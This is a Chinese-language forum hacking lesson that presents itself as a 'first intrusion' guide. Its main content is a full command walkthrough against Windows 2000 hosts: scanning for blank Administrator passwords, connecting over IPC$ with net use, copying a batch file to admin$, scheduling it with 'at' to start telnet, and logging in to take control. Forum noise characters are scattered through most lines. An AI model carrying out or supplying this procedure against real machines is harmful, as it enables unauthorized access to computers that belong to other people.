好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你的AK-47,我们不需要那个家伙....( l6 M6 N% o+ y" Z
( g# n" Q5 _% _
A.什么是ipc?
~+ V6 ~& v/ w! I4 B) r2 J6 ^# H2 M! M; C
" q; O0 W' y9 i: G* c IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
; ^; @5 N& l0 v# w2 `. S5 G
, z, D5 l" A, \9 O B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?/ B! }0 q' V9 X" d9 L+ V; q( V
+ I! M3 w) E$ E7 u7 p 需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上K了你!), A& u: ?( K. t0 I) @7 @
" I8 e |# x2 q7 Z4 V) N% q
首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)3 f5 H* k) }7 Y, p
' P+ q1 B% B' I 假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
7 u' p+ |. o+ j; z% C) I5 B0 w8 U/ f2 R* t3 z
打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~
) a( m6 ^' S) i% P8 J' O Z9 W
6 J4 `$ F2 S3 I at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
$ G" H1 Z+ Y' k& S0 f7 [6 }& ]7 T2 j
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\+ t' e7 f! X, |2 D; }
3 v. R) a8 B4 V: f {
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\; Z9 l; C5 z9 Q" _9 `8 U" r' n2 R
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
7 H7 I; w4 _; M$ d4 L; X [- E( p
; i( ~. j- m8 p0 u! e! G# o5 o" z 假设是晚上9点.接着下一步吧!
J! y- f$ `/ G5 h# j Z9 Y9 e2 H5 Y) g
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
& G6 Q- |0 C% `6 v0 J
6 E) V# o. B1 E0 q/ W H" U net time \\127.0.0.1 \\看看到时间没?\\; l4 M/ ~; C/ s; V
, }+ z1 Y7 t/ [9 V5 h/ O2 U+ | 假设到了,我们就实行下一步吧!
% m* E* e7 h8 S+ k' Y# k' X; q# R
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
d( c; I) X8 z: a" _4 S9 T) |
接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\
- U4 E1 y+ c8 ^" Q9 V
0 z% L* \! Z/ G" ^' U& m" H9 d! e, F OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)& p6 @0 D7 s: ]- e! k
) m$ }, `% L2 }8 V" i) P/ E; F
请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.# m5 U3 H0 o% t$ _9 n7 k) f& ?
8 } q6 Z# t: U% P L- k$ b
---------------基础课程<完>
8 U( z: x5 N* d3 H
( J; \ g1 e4 t0 ^" D8 ` 好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上& B- d9 ^& z( F. D
( s- |6 J2 Z* Y4 T. C; O5 n9 q
面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了9 J$ g- k# V( ` i3 U8 n
|
|